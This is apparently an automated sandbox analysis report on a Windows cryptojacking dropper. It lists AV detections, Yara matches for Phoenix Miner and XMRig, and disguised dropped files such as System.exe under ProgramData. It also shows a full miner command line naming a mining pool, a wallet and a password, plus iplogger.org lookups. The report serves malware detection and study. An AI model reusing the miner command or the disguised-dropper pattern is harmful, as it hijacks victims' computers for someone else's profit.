Windows Analysis Report pj31M24DLn

Source: Process started

Author: Joe Security: Data: Command: -epool eth.2miners.com:2020 -ewal 0x1bc6d72712986fDF33860e1e1B55C11000901350 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -coin eth, CommandLine: -epool eth.2miners.com:2020 -ewal 0x1bc6d72712986fDF33860e1e1B55C11000901350 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -coin eth, CommandLine|base64offset|contains: , Image: C:\ProgramData\Data\Database.exe, NewProcessName: C:\ProgramData\Data\Database.exe, OriginalFileName: C:\ProgramData\Data\Database.exe, ParentCommandLine: C:\Users\user\Desktop\pj31M24DLn.exe, ParentImage: C:\Users\user\Desktop\pj31M24DLn.exe, ParentProcessId: 6580, ProcessCommandLine: -epool eth.2miners.com:2020 -ewal 0x1bc6d72712986fDF33860e1e1B55C11000901350 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -coin eth, ProcessId: 6928

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus detection for dropped file

Source: C:\ProgramData\Data\Database.exe

Avira: detection malicious, Label: HEUR/AGEN.1141501

Multi AV Scanner detection for submitted file

Source: pj31M24DLn.exe	Virustotal: Detection: 35%			Perma Link
Source: pj31M24DLn.exe	ReversingLabs: Detection: 32%

Multi AV Scanner detection for dropped file

Source: C:\ProgramData\Microsoft Network\System.exe	ReversingLabs: Detection: 32%
Source: C:\ProgramData\Systemd\Datahub.exe	ReversingLabs: Detection: 51%
Source: C:\ProgramData\Systemd\old.exe (copy)	ReversingLabs: Detection: 51%

Machine Learning detection for sample

Source: pj31M24DLn.exe

Joe Sandbox ML: detected

Machine Learning detection for dropped file

Source: C:\ProgramData\Systemd\Datahub.exe	Joe Sandbox ML: detected
Source: C:\ProgramData\Microsoft Network\System.exe	Joe Sandbox ML: detected

Source: C:\Users\user\Desktop\pj31M24DLn.exe	Code function: 5_2_0041AD90 BCryptOpenAlgorithmProvider,BCryptSetProperty,BCryptGetProperty,BCryptDestroyKey,BCryptCloseAlgorithmProvider,BCryptGenerateSymmetricKey,	5_2_0041AD90
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Code function: 5_2_0041B0E0 BCryptOpenAlgorithmProvider,BCryptDeriveKeyPBKDF2,BCryptCloseAlgorithmProvider,	5_2_0041B0E0
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Code function: 5_2_0041B0B0 BCryptFinishHash,	5_2_0041B0B0
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Code function: 5_2_0041B150 BCryptGenRandom,	5_2_0041B150
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Code function: 5_2_0041AD50 BCryptDestroyKey,BCryptCloseAlgorithmProvider,	5_2_0041AD50
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Code function: 5_2_0041AD20 BCryptEncrypt,	5_2_0041AD20
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Code function: 5_2_0041AEF0 BCryptDestroyHash,BCryptCloseAlgorithmProvider,	5_2_0041AEF0
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Code function: 5_2_0041AEB0 BCryptHashData,	5_2_0041AEB0
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Code function: 5_2_0041AF40 BCryptOpenAlgorithmProvider,BCryptDestroyHash,BCryptCloseAlgorithmProvider,BCryptGetProperty,BCryptGetProperty,BCryptCreateHash,	5_2_0041AF40
Source: C:\ProgramData\Microsoft Network\System.exe	Code function: 42_2_0041B0E0 BCryptOpenAlgorithmProvider,BCryptDeriveKeyPBKDF2,BCryptCloseAlgorithmProvider,	42_2_0041B0E0
Source: C:\ProgramData\Microsoft Network\System.exe	Code function: 42_2_0041B0B0 BCryptFinishHash,	42_2_0041B0B0
Source: C:\ProgramData\Microsoft Network\System.exe	Code function: 42_2_0041B150 BCryptGenRandom,	42_2_0041B150
Source: C:\ProgramData\Microsoft Network\System.exe	Code function: 42_2_0041AD50 BCryptDestroyKey,BCryptCloseAlgorithmProvider,	42_2_0041AD50
Source: C:\ProgramData\Microsoft Network\System.exe	Code function: 42_2_0041AD20 BCryptEncrypt,	42_2_0041AD20
Source: C:\ProgramData\Microsoft Network\System.exe	Code function: 42_2_0041AD90 BCryptOpenAlgorithmProvider,BCryptSetProperty,BCryptGetProperty,BCryptDestroyKey,BCryptCloseAlgorithmProvider,BCryptGenerateSymmetricKey,	42_2_0041AD90
Source: C:\ProgramData\Microsoft Network\System.exe	Code function: 42_2_0041AEF0 BCryptDestroyHash,BCryptCloseAlgorithmProvider,	42_2_0041AEF0
Source: C:\ProgramData\Microsoft Network\System.exe	Code function: 42_2_0041AEB0 BCryptHashData,	42_2_0041AEB0
Source: C:\ProgramData\Microsoft Network\System.exe	Code function: 42_2_0041AF40 BCryptOpenAlgorithmProvider,BCryptDestroyHash,BCryptCloseAlgorithmProvider,BCryptGetProperty,BCryptGetProperty,BCryptCreateHash,	42_2_0041AF40

Bitcoin Miner:

Yara detected Phoenix Miner

Source: Yara match	File source: 00000008.00000003.283579328.0000014CD6E73000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000004D.00000003.356027445.000001C954DC5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.283842107.0000014CD6E69000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.283811817.0000014CD6E69000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.283765357.0000014CD6E69000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000004D.00000002.356735670.000001C954DC5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.284163364.0000014CD6E6D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.284116824.0000014CD6E37000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 0000004D.00000003.355915521.000001C954DC5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Database.exe PID: 6928, type: MEMORYSTR

Yara detected Xmrig cryptocurrency miner

Source: Yara match	File source: 12.0.Datahub.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.Datahub.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000002A.00000003.437528742.00000000018E7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000002A.00000003.465261330.0000000001938000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000002A.00000003.465421064.000000000192C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000002A.00000003.383736027.00000000018E7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.484792621.00000000013B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.411819516.00000000013BE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000002A.00000003.343435775.00000000018A5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000002A.00000003.431283436.0000000001929000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.393725666.00000000013C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.412427558.00000000013BE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000004E.00000000.353211756.0000000000E04000.00000008.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.372414007.00000000013A7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.429857116.00000000013AB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000002A.00000003.431315418.000000000192E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.453671282.0000000001400000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000002A.00000003.383874736.00000000018E7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000002A.00000003.448782683.0000000001937000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000002A.00000003.479728696.0000000001948000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.470837332.0000000001377000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.349652487.0000000001394000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.484245759.0000000001406000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000000.295411010.0000000000958000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000004E.00000002.357680214.0000000000E04000.00000008.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002E.00000000.320822201.0000000000958000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.446937269.0000000001377000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.470593774.00000000013D9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000002A.00000003.343399028.000000000189C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.411711852.0000000001390000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.297772498.0000000000958000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.317187846.0000000001377000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000002E.00000002.325073145.0000000000E04000.00000008.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.440717906.00000000013AC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.496915008.0000000001377000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.298674276.0000000000E04000.00000008.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002E.00000000.322405849.0000000000E04000.00000008.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002E.00000002.324682888.0000000000958000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.445919098.00000000013EF000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.440557165.00000000013AC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000002A.00000003.343038623.00000000018AB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.447150779.00000000013BF000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000004E.00000000.352973330.0000000000958000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000000.295990788.0000000000E04000.00000008.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000004E.00000002.356898921.0000000000958000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.393985986.000000000138D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.484465991.00000000013B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.453800170.0000000001377000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: pj31M24DLn.exe PID: 6580, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Datahub.exe PID: 7136, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: System.exe PID: 1012, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\Systemd\Datahub.exe, type: DROPPED

Found strings related to Crypto-Mining

Source: Datahub.exe	String found in binary or memory: stratum+ssl://randomx.xmrig.com:443
Source: Datahub.exe	String found in binary or memory: cryptonight_v7
Source: Datahub.exe	String found in binary or memory: -o, --url=URL URL of mining server
Source: Datahub.exe	String found in binary or memory: stratum+tcp://
Source: Datahub.exe	String found in binary or memory: Usage: xmrig [OPTIONS] Network:
Source: pj31M24DLn.exe, 00000005.00000003.484792621.00000000013B0000.00000004.00000001.sdmp	String found in binary or memory: FileDescriptionXMRig miner.

Source: pj31M24DLn.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: unknown	HTTPS traffic detected: 88.99.66.31:443 -> 192.168.2.5:49702 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.192.141.1:443 -> 192.168.2.5:49703 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.217.108.52:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 88.99.66.31:443 -> 192.168.2.5:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.192.141.1:443 -> 192.168.2.5:49714 version: TLS 1.2

Source: pj31M24DLn.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb! source: Database.exe, 00000008.00000002.296694327.00007FF67BCBD000.00000040.00020000.sdmp
Source:	Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb source: Database.exe, 00000008.00000002.296694327.00007FF67BCBD000.00000040.00020000.sdmp

Source: C:\Users\user\Desktop\pj31M24DLn.exe	Code function: 5_2_00422CE4 FindClose,FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError,	5_2_00422CE4
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Code function: 5_2_00422D04 FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError,	5_2_00422D04
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Code function: 5_2_0043BD1D FindFirstFileExW,	5_2_0043BD1D
Source: C:\ProgramData\Microsoft Network\System.exe	Code function: 42_2_00422CE4 FindClose,FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError,	42_2_00422CE4
Source: C:\ProgramData\Microsoft Network\System.exe	Code function: 42_2_00422D04 FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError,	42_2_00422D04
Source: C:\ProgramData\Microsoft Network\System.exe	Code function: 42_2_0043BD1D FindFirstFileExW,	42_2_0043BD1D

Source: C:\Users\user\Desktop\pj31M24DLn.exe	Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h		1_2_0652B0E8
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h		1_2_0652B0D8

Networking:

May check the online IP address of the machine

Source: C:\Users\user\Desktop\pj31M24DLn.exe	DNS query: name: iplogger.org
Source: C:\ProgramData\Microsoft Network\System.exe	DNS query: name: iplogger.org

Source: C:\Users\user\Desktop\pj31M24DLn.exe

Code function: 5_2_004064FB GetConsoleWindow,ShowWindow,InternetOpenW,InternetConnectW,HttpOpenRequestW,HttpSendRequestW,GetLastError,InternetReadFile,OutputDebugStringA,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CreateDirectoryW,GetFileAttributesW,GetFileAttributesW,SetFileAttributesW,SetFileAttributesW,CreateDirectoryW,GetFileAttributesW,SetFileAttributesW,CreateDirectoryW,GetFileAttributesW,SetFileAttributesW,GetProcessHeap,HeapAlloc,HeapAlloc,GetProcessHeap,HeapAlloc,lstrcpyW,SHGetSpecialFolderPathW,lstrcatW,GetProcessHeap,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,CreateThread,CloseHandle,Sleep,URLDownloadToFileW,Sleep,OutputDebugStringA,Sleep,URLDownloadToFileW,URLDownloadToFileW,CreateProcessA,CloseHandle,CloseHandle,CreateProcessA,CloseHandle,CloseHandle,CreateProcessA,CloseHandle,CloseHandle,CreateProcessA,CloseHandle,CloseHandle,CreateProcessA,CloseHandle,CloseHandle,Sleep,Sleep,URLDownloadToFileW,

Source: pj31M24DLn.exe, 00000005.00000003.446204153.0000000001304000.00000004.00000001.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertBaltimoreCA-2G2.crt0
Source: System.exe, 0000002A.00000003.437449501.000000000189C000.00000004.00000001.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertSH
Source: System.exe, 0000002A.00000003.343399028.000000000189C000.00000004.00000001.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2ExA
Source: pj31M24DLn.exe, 00000005.00000002.495847009.0000000001288000.00000004.00000020.sdmp, System.exe, 0000002A.00000003.488359293.000000000189C000.00000004.00000001.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2ExtendedValidationServerCA.crt0
Source: System.exe, 0000002A.00000003.437449501.000000000189C000.00000004.00000001.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHExA
Source: pj31M24DLn.exe, 00000005.00000002.495889503.00000000012A6000.00000004.00000020.sdmp, System.exe, 0000002A.00000002.498958735.00000000017B8000.00000004.00000020.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: pj31M24DLn.exe, 00000005.00000002.495889503.00000000012A6000.00000004.00000020.sdmp, System.exe, 0000002A.00000002.499351188.0000000001826000.00000004.00000020.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: pj31M24DLn.exe, 00000005.00000003.446204153.0000000001304000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertBaltimoreCA-2G2.crl0:
Source: pj31M24DLn.exe, 00000005.00000003.446204153.0000000001304000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
Source: pj31M24DLn.exe, 00000005.00000002.495847009.0000000001288000.00000004.00000020.sdmp, System.exe, 0000002A.00000003.488359293.000000000189C000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/sha2-ev-server-g2.crl04
Source: pj31M24DLn.exe, 00000005.00000003.253185593.0000000001307000.00000004.00000001.sdmp, System.exe, 0000002A.00000003.488359293.000000000189C000.00000004.00000001.sdmp	String found in binary or memory: http://crl4.di
Source: System.exe, 0000002A.00000003.488359293.000000000189C000.00000004.00000001.sdmp	String found in binary or memory: http://crl4.dice$
Source: System.exe, 0000002A.00000003.343399028.000000000189C000.00000004.00000001.sdmp	String found in binary or memory: http://crl4.digice$
Source: pj31M24DLn.exe, 00000005.00000003.446204153.0000000001304000.00000004.00000001.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertBaltimoreCA-2G2.crl0K
Source: pj31M24DLn.exe, 00000005.00000003.440474725.0000000001377000.00000004.00000001.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: pj31M24DLn.exe, 00000005.00000002.495847009.0000000001288000.00000004.00000020.sdmp, System.exe, 0000002A.00000003.488637129.0000000001937000.00000004.00000001.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0=
Source: pj31M24DLn.exe, 00000005.00000002.495847009.0000000001288000.00000004.00000020.sdmp, System.exe, 0000002A.00000003.488637129.0000000001937000.00000004.00000001.sdmp	String found in binary or memory: http://crl4.digicert.com/sha2-ev-server-g2.crl0K
Source: pj31M24DLn.exe, 00000005.00000002.495889503.00000000012A6000.00000004.00000020.sdmp, System.exe, 0000002A.00000002.499351188.0000000001826000.00000004.00000020.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#
Source: pj31M24DLn.exe, 00000001.00000002.252914665.0000000008680000.00000002.00000001.sdmp, pj31M24DLn.exe, 00000001.00000003.228780930.000000000859D000.00000004.00000001.sdmp, System.exe, 00000009.00000002.318725201.0000000007E90000.00000002.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: System.exe, 0000002A.00000002.498958735.00000000017B8000.00000004.00000020.sdmp	String found in binary or memory: http://iplogger.org/1bUgq7
Source: pj31M24DLn.exe, 00000005.00000002.495750387.0000000001237000.00000004.00000020.sdmp	String found in binary or memory: http://iplogger.org/1bUgq70
Source: pj31M24DLn.exe, 00000005.00000003.363766362.0000000001377000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.2u
Source: pj31M24DLn.exe, 00000005.00000002.495889503.00000000012A6000.00000004.00000020.sdmp, System.exe, 0000002A.00000002.498958735.00000000017B8000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: pj31M24DLn.exe, 00000005.00000003.253185593.0000000001307000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.dig
Source: pj31M24DLn.exe, 00000005.00000003.253185593.0000000001307000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert
Source: pj31M24DLn.exe, 00000005.00000003.446204153.0000000001304000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0:
Source: pj31M24DLn.exe, 00000005.00000003.446204153.0000000001304000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: pj31M24DLn.exe, 00000005.00000002.495847009.0000000001288000.00000004.00000020.sdmp, System.exe, 0000002A.00000003.488637129.0000000001937000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0K
Source: pj31M24DLn.exe, 00000005.00000002.495847009.0000000001288000.00000004.00000020.sdmp, System.exe, 0000002A.00000003.488637129.0000000001937000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0R
Source: pj31M24DLn.exe, 00000005.00000002.495889503.00000000012A6000.00000004.00000020.sdmp, System.exe, 0000002A.00000002.499351188.0000000001826000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.sectigo.com0
Source: pj31M24DLn.exe, 00000001.00000002.247771494.0000000002FD1000.00000004.00000001.sdmp, System.exe, 00000009.00000002.308898772.0000000002981000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: pj31M24DLn.exe, 00000001.00000002.252914665.0000000008680000.00000002.00000001.sdmp, System.exe, 00000009.00000002.318725201.0000000007E90000.00000002.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: pj31M24DLn.exe, 00000001.00000003.231298223.00000000085CC000.00000004.00000001.sdmp	String found in binary or memory: http://www.ascendercorp.com/typedesigners.html
Source: pj31M24DLn.exe, 00000001.00000002.252914665.0000000008680000.00000002.00000001.sdmp, System.exe, 00000009.00000002.318725201.0000000007E90000.00000002.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: pj31M24DLn.exe, 00000005.00000003.446204153.0000000001304000.00000004.00000001.sdmp	String found in binary or memory: http://www.digicert.com/CPS0
Source: pj31M24DLn.exe, 00000001.00000002.252914665.0000000008680000.00000002.00000001.sdmp, System.exe, 00000009.00000002.318725201.0000000007E90000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: System.exe, 00000009.00000002.318725201.0000000007E90000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: pj31M24DLn.exe, 00000001.00000003.232769882.00000000085CE000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/
Source: pj31M24DLn.exe, 00000001.00000002.252914665.0000000008680000.00000002.00000001.sdmp, System.exe, 00000009.00000002.318725201.0000000007E90000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: pj31M24DLn.exe, 00000001.00000003.232862983.00000000085CE000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/b
Source: pj31M24DLn.exe, 00000001.00000002.252914665.0000000008680000.00000002.00000001.sdmp, System.exe, 00000009.00000002.318725201.0000000007E90000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: pj31M24DLn.exe, 00000001.00000002.252914665.0000000008680000.00000002.00000001.sdmp, pj31M24DLn.exe, 00000001.00000003.233422590.00000000085CE000.00000004.00000001.sdmp, System.exe, 00000009.00000002.318725201.0000000007E90000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: pj31M24DLn.exe, 00000001.00000002.252914665.0000000008680000.00000002.00000001.sdmp, pj31M24DLn.exe, 00000001.00000003.233422590.00000000085CE000.00000004.00000001.sdmp, System.exe, 00000009.00000002.318725201.0000000007E90000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: pj31M24DLn.exe, 00000001.00000002.252914665.0000000008680000.00000002.00000001.sdmp, pj31M24DLn.exe, 00000001.00000003.234107966.00000000085CE000.00000004.00000001.sdmp, System.exe, 00000009.00000002.318725201.0000000007E90000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: pj31M24DLn.exe, 00000001.00000002.252914665.0000000008680000.00000002.00000001.sdmp, System.exe, 00000009.00000002.318725201.0000000007E90000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: pj31M24DLn.exe, 00000001.00000003.234158958.00000000085CE000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersbq$o
Source: pj31M24DLn.exe, 00000001.00000003.234394120.00000000085CE000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersmq3o
Source: pj31M24DLn.exe, 00000001.00000003.232830879.00000000085CE000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersp
Source: pj31M24DLn.exe, 00000001.00000003.233141606.00000000085CE000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designerst
Source: pj31M24DLn.exe, 00000001.00000003.234107966.00000000085CE000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersxq
Source: pj31M24DLn.exe, 00000001.00000003.246562432.0000000008598000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.comionF
Source: pj31M24DLn.exe, 00000001.00000003.246562432.0000000008598000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.comuea
Source: pj31M24DLn.exe, 00000001.00000002.252914665.0000000008680000.00000002.00000001.sdmp, System.exe, 00000009.00000002.318725201.0000000007E90000.00000002.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: pj31M24DLn.exe, 00000001.00000002.252914665.0000000008680000.00000002.00000001.sdmp, System.exe, 00000009.00000002.318725201.0000000007E90000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: pj31M24DLn.exe, 00000001.00000003.229901136.00000000085BE000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/?
Source: pj31M24DLn.exe, 00000001.00000002.252914665.0000000008680000.00000002.00000001.sdmp, System.exe, 00000009.00000002.318725201.0000000007E90000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: pj31M24DLn.exe, 00000001.00000002.252914665.0000000008680000.00000002.00000001.sdmp, System.exe, 00000009.00000002.318725201.0000000007E90000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: pj31M24DLn.exe, 00000001.00000003.229822593.00000000085BE000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cntjo7o
Source: pj31M24DLn.exe, 00000001.00000002.252914665.0000000008680000.00000002.00000001.sdmp, System.exe, 00000009.00000002.318725201.0000000007E90000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: pj31M24DLn.exe, 00000001.00000002.252914665.0000000008680000.00000002.00000001.sdmp, pj31M24DLn.exe, 00000001.00000003.235451226.00000000085C1000.00000004.00000001.sdmp, pj31M24DLn.exe, 00000001.00000003.235311344.00000000085C1000.00000004.00000001.sdmp, System.exe, 00000009.00000002.318725201.0000000007E90000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: pj31M24DLn.exe, 00000001.00000002.252914665.0000000008680000.00000002.00000001.sdmp, System.exe, 00000009.00000002.318725201.0000000007E90000.00000002.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: pj31M24DLn.exe, 00000001.00000003.230977792.0000000008599000.00000004.00000001.sdmp, System.exe, 00000009.00000002.318725201.0000000007E90000.00000002.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: pj31M24DLn.exe, 00000001.00000003.230977792.0000000008599000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/$
Source: pj31M24DLn.exe, 00000001.00000003.231181486.0000000008597000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/-
Source: pj31M24DLn.exe, 00000001.00000003.230977792.0000000008599000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/6
Source: pj31M24DLn.exe, 00000001.00000003.230546787.0000000008594000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/=
Source: pj31M24DLn.exe, 00000001.00000003.230546787.0000000008594000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/?
Source: pj31M24DLn.exe, 00000001.00000003.230977792.0000000008599000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/B
Source: pj31M24DLn.exe, 00000001.00000003.230977792.0000000008599000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/T
Source: pj31M24DLn.exe, 00000001.00000003.230977792.0000000008599000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/Y0
Source: pj31M24DLn.exe, 00000001.00000003.230977792.0000000008599000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/g
Source: pj31M24DLn.exe, 00000001.00000003.230781709.0000000008597000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/it-i
